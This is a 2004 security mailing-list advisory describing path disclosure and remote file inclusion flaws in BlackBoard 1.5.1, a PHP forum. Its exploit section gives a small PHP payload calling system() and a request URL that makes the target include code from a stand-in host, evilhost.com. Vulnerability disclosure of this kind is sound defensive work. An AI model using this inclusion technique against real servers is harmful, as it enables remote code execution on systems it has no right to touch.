[UNIX] BlackBoard Path Disclosure and File Inclusion Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 10/11/04

  • Next message: SecuriTeam: "[UNIX] HTTP Response Splitting in WordPress" 
    To: list@securiteam.com
Date: 11 Oct 2004 19:16:48 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      BlackBoard Path Disclosure and File Inclusion Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://blackboard.unclassified.de/> BlackBoard is "an open-source,
    PHP-based internet bulletin board software, almost like any other around".

    Two vulnerabilities have been discovered in BlackBoard, a path disclosure
    vulnerability and a file inclusion vulnerability. Using the file inclusion
    vulnerability it is possible to cause the remote site to execute arbitrary
    code, using the path disclosure vulnerability it is possible to discover
    the true path under which the product has been installed.

    DETAILS

    Vulnerable Systems:
     * BlackBoard version 1.5.1

    Path Disclosure:
    By requesting the following file it is possible to retrieve the actual
    path under which the BlackBoard product is installed:
    http://target/bb_lib/checkdb.inc.php

    The response would look like:
    Warning: main(lang/_more.php): failed to open stream: No such file or
    directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

    Fatal error: main(): Failed opening required 'lang/_more.php'
    (include_path='.:/usr/local/lib/php') in
    /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

    The same issue also occurs in admin.inc.php, cp.inc.php and others.

    File Inclusion:
    The /bb_lib/admin.inc.php incorrectly uses the following unsensitized
    require function call:
    require($libpath . 'lang/' . $LANG . '_more.php');

    Meaning anyone can replace the libpath parameter with whichever file they
    desire causing the inclusion of arbitrary files.

    Exploit:
    Create a file called _more.php on your web site with the following
    content:
    <?
    system("uname -a;id;ls -al");
    ?>

    Then issue a request of the sorts of, to cause it to get included and
    executed:
    http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/

    Vendor response:
    The vendor has issued a patch that addresses this issues.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Cracklove@gmail.com> Lin
    Xiaofeng.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] HTTP Response Splitting in WordPress"

    Relevant Pages